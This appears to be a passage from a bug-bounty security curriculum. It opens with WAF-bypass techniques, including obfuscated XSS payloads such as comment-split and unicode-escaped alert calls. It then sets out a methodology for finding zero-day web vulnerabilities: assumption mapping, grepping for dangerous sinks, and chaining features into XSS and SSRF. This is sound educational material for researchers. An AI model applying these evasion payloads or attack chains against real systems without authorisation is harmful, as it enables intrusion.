3. Charset Confusion: Declares a non-standard charset in the Content-Type header. If the WAF decodes the request body using one charset while the backend uses another, the WAF may see garbled or different bytes than what the application actually processes.

4. Comment Insertion: Breaks up signature strings using JavaScript comments (/* */, //). al/**/ert(1) is not the string alert but executes identically in JavaScript. Bypasses WAF signatures that match on the literal string.

5. Identifier Unicode Escapes: Uses JavaScript's \uXXXX Unicode escape syntax in identifiers. \u0061lert(1) is equivalent to alert(1). WAF signatures matching the ASCII string alert won't match the escaped form, but the JavaScript engine evaluates both identically.

6. String Concatenation: Builds blocked strings through concatenation: window['al'+'ert'](1). No single string token in the payload matches alert. The concatenation happens at runtime.

7. Path Confusion: Tests payloads across different URL paths on the same application to exploit inconsistent WAF inspection profiles. High-value endpoints get strict inspection; lower-priority paths may have weaker or no inspection of the same payload types.

8. HTTP Verb Tampering: Sends requests using unusual HTTP methods (PUT, PATCH, DELETE, OPTIONS, TRACE) that the WAF may not inspect as thoroughly as GET and POST. Some applications process these methods and reflect parameters, while the WAF's ruleset focuses on common methods.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -

None
Find Your Purpose, Good Bye

Zero-Day Finding — The Complete Mindset & Methodology Guide

A zero-day is not found by running a scanner. It's found by understanding a system deeply enough to see what its builders didn't see. Everything in this guide is about developing that kind of vision.

What a Zero-Day Actually Is

A zero-day is a vulnerability unknown to the vendor — no patch exists, no CVE has been assigned, no public disclosure has happened. The term is often misused to mean "any unpatched vulnerability." The precise meaning is: the vendor has zero days of warning. You found something they don't know about.

The practical implication is that finding zero-days requires going somewhere automated tools and known-vulnerability databases haven't already gone. That means either looking at new code, looking at old code in a new way, or looking at interactions between components that no one has modeled carefully before.

The Core Mental Shift

Every security tool you've learned — Burp Suite, DalFox, SQLMap, nuclei — finds known vulnerability patterns. They're pattern matchers. They're valuable, but they find yesterday's vulnerabilities, not tomorrow's. Zero-day research requires a different mode of thinking entirely.

The shift is from asking "does this match a known pattern?" to asking "does this system behave consistently with its own assumptions?"

Every application is a set of assumptions layered on top of other assumptions. The developer assumes the HTML parser will treat their template as they intend. The developer assumes their sanitizer covers all execution vectors. The developer assumes the cache will key on everything that matters. The developer assumes the XML parser won't make external network requests. Zero-days live in the gaps between what developers assume and what systems actually do. Your job is to find those gaps.

The Five Questions — Applied to Every Feature

When you encounter any feature in any application, run it through these five questions before you test anything. This is the zero-day thinking process made explicit.

Question 1: Where does user input enter this feature?

  • Think beyond the obvious. The form field is obvious. What about the file name of an uploaded file? The metadata embedded in an uploaded image? The OAuth callback URL? The webhook destination URL? The email address used for registration? The browser's Accept-Language header that the application uses to serve localized content? The value of a cookie the application reads and processes? The referrer header? Every one of these is user-controlled input. Map all of them before testing any of them.

Question 2: What transformations happen between input and output?

  • Trace the data forward. Does it get stored? In what format? Does a different component retrieve it? Does it get sanitized? At which layer — storage or retrieval? Does it get encoded? Does it get decoded somewhere downstream? Does it pass through multiple systems — an API gateway, a message queue, a background worker, a template renderer? Each transformation is a potential point where the developer's model of the data diverges from what the data actually contains.

Question 3: What does the system trust that it shouldn't?

  • Enumerate the trust assumptions. The application trusts that JPEG files uploaded to the image endpoint are actually images. The application trusts that the user ID in the JWT was set by the server. The application trusts that the hostname in the Host header matches one of its configured domains. The application trusts that the URL provided for webhook testing points to an external service, not to 169.254.169.254. Each trust assumption that isn't enforced by a check is a potential vulnerability.

Question 4: Where does this feature interact with other features?

  • Isolated features are usually well-tested in isolation. The interesting vulnerabilities live at feature intersections. The file upload feature combined with the document preview feature. The search feature combined with the export-to-PDF feature. The user profile field combined with the admin notification system. When two features interact, each was probably designed and tested without deep consideration of the other. The interaction surface is where assumptions break.

Question 5: What happens at the boundaries of expected input?

  • Every feature has an implicit model of what valid input looks like. What happens at the edges of that model? What if the string is 0 characters? 100,000 characters? What if the number is negative? Zero? Float instead of integer? What if the JSON has unexpected nested depth? What if the array has 10,000 elements? What if the filename contains a null byte? A forward slash? Unicode right-to-left override characters? Boundary conditions are where parsers and validators make mistakes.

The Assumption Mapping Process

Before touching Burp Suite, before sending a single request, do this on paper or in a notes file. Take the feature you're researching and write out every assumption the system makes about it in plain language.

For a file upload feature, the assumption list might look like:

1. The uploaded file is the type declared by its extension
2. The uploaded file is the type declared by its Content-Type header
3. The uploaded file content matches its declared type
4. The file name doesn't contain path traversal sequences
5. The file name doesn't contain null bytes
6. The file doesn't contain embedded scripts (for image types)
7. The file size is within limits
8. The file doesn't reference external entities (for XML-based formats)
9. Processing the file doesn't execute any code
10. The storage path for the file is controlled by the server, not the client.

Now go through each assumption and ask: where is this assumption enforced? Is it enforced by a check in the application code? By the storage backend? By the CDN? By the browser? By convention? Assumptions enforced by convention rather than code are your primary targets.

For assumption 1 (the file matches its declared extension): is this checked at all? If the check is "does the filename end in .jpg", what happens when you upload a file named shell.php.jpg? What does the server do with it? Does it store it and serve it? What Content-Type does it serve it with? If the server serves it with Content-Type: image/jpeg, the browser won't execute it. If the server sniffs the content and determines it's PHP, it might execute it. If the server stores it and another component processes it, that component might not apply the same check.

This process — enumerate assumptions, then verify each one — is the systematic approach to finding vulnerabilities that automated tools miss.

Reading Source Code for Zero-Days

When source code is available — open source applications, extracted source maps, GitHub repositories for targets with a bug bounty program that includes open-source components — code review accelerates zero-day discovery dramatically. Here is the specific reading process.

Start with the data flow, not the feature list. Don't read the code top to bottom. Find the entry points — the HTTP route handlers, the WebSocket message handlers, the message queue consumers — and trace data forward from those entry points. Follow the data through function calls, across module boundaries, into storage and back out of storage, until it reaches an output sink or a privileged operation.

Look for the distance between validation and use. The most dangerous pattern in any codebase is validation at one layer and use at another, with no guarantee that the data hasn't changed between the two. A URL is validated to be an https:// URL at the API controller layer, then stored, then fetched by a background worker that doesn't re-validate. Between storage and execution, can the URL be modified? Is there a race condition? Can an attacker trigger the fetch before the validation result is applied?

Find the places where the developer left a note. Comments like "// TODO: sanitize this", "// FIXME: validate input here", "// temporary workaround", or "// this assumes X" are direct admission of unresolved assumptions. Every TODO in a security-relevant code path is a potential finding.

Look for framework misuse. Every framework has a safe default and an unsafe escape hatch. React has dangerouslySetInnerHTML. Angular has bypassSecurityTrustHtml. Django's ORM has .raw(). Rails has html_safe. SQLAlchemy has text(). grep for every escape hatch in the codebase and examine each one. Ask: who controls the value being passed here, and did the developer actually verify it's safe?

Grep for known-dangerous patterns regardless of context. Even if a specific instance turns out to be safe, building a map of where every dangerous pattern appears tells you where to focus attention. Your grep list for a JavaScript codebase:

innerHTML
outerHTML
insertAdjacentHTML
document.write
eval(
Function(
setTimeout(  ← only dangerous when first arg is a string
setInterval(  ← same
location.href =
location.assign
location.replace
window.name
document.referrer
postMessage
localStorage
dangerouslySetInnerHTML
v-html
bypassSecurityTrust
srcdoc

The Changelog Reading Habit

Every security patch in a software changelog is a description of a vulnerability that existed before the patch. If you read the security patches for a library, framework, or application, you learn:

  • What class of vulnerability the developers have made before
  • Where in the codebase they tend to make mistakes
  • What assumptions they hold that have been violated in the past

Developers are human and tend to repeat patterns — both good patterns and mistake patterns. A project that has had multiple XSS vulnerabilities in its template rendering layer probably still has undiscovered ones in adjacent code. A project that has had multiple SSRF vulnerabilities in its URL-fetching code probably has additional fetch operations that haven't been audited.

Read the CVE history for every major dependency in your target's stack. Read the GitHub issues tagged "security." Read the security bulletins. Each one is a map to the developer's blind spots.

Feature Interaction Research — The Highest-Yield Approach

The most consistently productive zero-day research approach is deliberately combining features that were designed independently and observing what happens at their intersection.

The process is systematic. List every feature in the application that accepts input. List every feature that produces output. Draw lines between every input feature and every output feature and ask: could data from this input reach this output, even indirectly?

Some intersection examples that have historically produced zero-days:

Profile field → PDF export: The user sets a name or bio containing XSS payload characters. The application has a feature that exports account data to PDF. The PDF generation library (wkhtmltopdf, puppeteer, PhantomJS) renders HTML — and if it renders the user's profile field without sanitization, the XSS fires in the headless browser's context, potentially accessing the PDF generator's internal network. This is a SSRF via XSS via PDF generation — a three-component chain.

Search → Email notification: The application sends email notifications summarizing recent search queries. If the email is rendered as HTML and the search query is embedded without encoding, an XSS payload in the search query fires when the email is opened in a web-based email client. Web-based email clients are a different origin, so cookie theft isn't the goal — but the attacker can exfiltrate email content, inject links, or perform actions in the email client's context.

Webhook URL → Internal network: The application allows users to set webhook URLs for notifications. The webhook is fetched by the server. This is a classic SSRF if the server doesn't validate that the URL points to an external host. But even if the server validates the URL when it's set, does it re-validate when the webhook is triggered? Is there a race condition between validation and trigger?

Import feature → SQL injection: An application allows importing data from CSV or JSON files. The import parser constructs database queries from the imported data. If the parser doesn't parameterize those queries, an attacker can embed SQL injection payloads in the CSV that execute when the import is processed. This often bypasses WAF protection because the payload is inside an uploaded file, not a URL parameter.

The New Feature Opportunity Window

New features are the highest-density source of zero-days in any codebase. When a company ships a major new feature, that code has:

  • Less time in production than older code
  • Fewer security reviews than mature code
  • More aggressive assumptions because the developers were focused on making it work
  • Less integration with the existing security infrastructure (input validation, CSP, parameterized queries) that mature parts of the application have accumulated

Watch bug bounty program changelogs. Watch product announcement pages. Watch app store release notes. When a new feature is announced, that's the signal to go look at it before anyone else does. The window between a feature's release and its first vulnerability report is your opportunity window.

The tactical approach is to map the new feature's complete input surface immediately after release — before it's been security-tested — and run it through the five questions and the assumption mapping process. You're racing other researchers to be the first to apply careful adversarial thinking to code that hasn't had it applied yet.

Library and Dependency Research

Applications are built on dependencies — frameworks, utility libraries, parsing libraries, authentication libraries. Each dependency is a trust boundary: the application trusts the library to behave correctly and securely. When a library has a vulnerability, every application using that library inherits the vulnerability.

Zero-day research on libraries is high leverage because a single finding affects every application using that library version. The research process is to take a library, understand its security-relevant promises (the behaviors it guarantees), and then try to find inputs that violate those promises.

For a sanitization library, the promise is: "my output is safe for insertion into HTML." Try to find inputs where the output is not safe. Focus on:

  • Inputs that exploit the difference between the library's parser and the browser's parser (mXSS territory)
  • Inputs that exploit namespace switching between HTML, SVG, and MathML contexts
  • Inputs that are valid under one HTML5 parsing algorithm variant but produce different output under another
  • Inputs at the boundaries of the library's allowed-elements and allowed-attributes configuration

For an authentication library, the promise is: "a token I verify was issued by me and hasn't been tampered with." Try to find:

  • Algorithm confusion attacks (RS256 vs HS256 in JWT)
  • None algorithm acceptance
  • Key confusion between public and private keys
  • Timing-based signature verification bypasses

Documentation as an Attack Surface

API documentation, developer guides, and changelog notes are often the most accurate description of what a system actually does — more accurate than the code comments and sometimes more accurate than the code itself, because documentation is written for communication rather than implementation. Developers don't lie in documentation the way they sometimes cut corners in implementation.

Read the documentation for your target's API with adversarial eyes. When the documentation says "this endpoint accepts a URL for webhook delivery," that's an admission that the server fetches URLs. When it says "this field supports rich text formatting," that's an admission that user input is rendered as HTML somewhere. When it says "this feature integrates with third-party services," that's an admission of outbound network requests that might be redirectable.

Look for features documented as deprecated but not removed. Deprecated features are still in the codebase but receive less security review. Developers don't update security controls on deprecated endpoints. They don't add new mitigations to code they're planning to remove. But "planning to remove" often means "will be there for another three years."

The Zero-Day Researcher's Daily Practice

Zero-day research is a practice, not an event. The researchers who consistently find novel vulnerabilities do specific things regularly that compound into deep intuition over time.

They read browser engine changelogs and specification updates. When the HTML5 parsing specification changes or when a browser engine changes how it handles a specific tag or attribute, there's a window where applications that relied on the old behavior are suddenly vulnerable to a new attack vector that didn't exist before.

They read security research papers. Academic papers on web security, browser security, and protocol security often describe vulnerability classes years before those classes become widely exploited. The mXSS research, the HTTP request smuggling research, the cache deception research — all of these were described in papers before they became mainstream bug bounty findings.

They build things. Writing your own vulnerable applications and then exploiting them develops intuition about where mistakes happen. Building a sanitizer and then breaking it teaches you what assumptions sanitizer writers make. Building a simple caching layer and then poisoning it teaches you what cache operators get wrong.

They maintain a research notes system. Every failed attack attempt, every interesting behavior, every "that's weird" moment gets written down with enough context to be revisited. Most zero-days are not found in a single session — they're assembled from observations made across multiple sessions, sometimes across multiple targets, where a pattern becomes clear only in retrospect.

They develop specialization. The researchers who find the most novel vulnerabilities are usually deep experts in one specific area — one browser engine, one framework, one protocol. Depth in a narrow area builds the kind of intimate understanding that surfaces assumptions invisible to generalists. Pick one area and go deeper than anyone else in your immediate peer group.

The Last Thing

Zero-day research is fundamentally an act of imagination constrained by technical reality. You have to be able to imagine that a system could behave differently from how its builders intended, and then you have to be disciplined enough to verify whether that imagination corresponds to reality.

The technical skills in this curriculum — understanding parser state machines, understanding trust boundaries, understanding protocol mechanics — are the constraints that make your imagination productive rather than random. Without them, you're guessing. With them, you're reasoning.

The researchers who find the most zero-days are not the ones who know the most payloads. They're the ones who can look at a new system they've never seen before and, within a short time, identify the three assumptions it's making that its builders didn't verify. That ability comes from practice, from building the mental models that let you see systems the way a parser sees them rather than the way a user sees them.

That's what this entire curriculum has been building toward.

********************************************************************************************************************************************************

~ 3L173 H4CK3R 1337 🙂✌️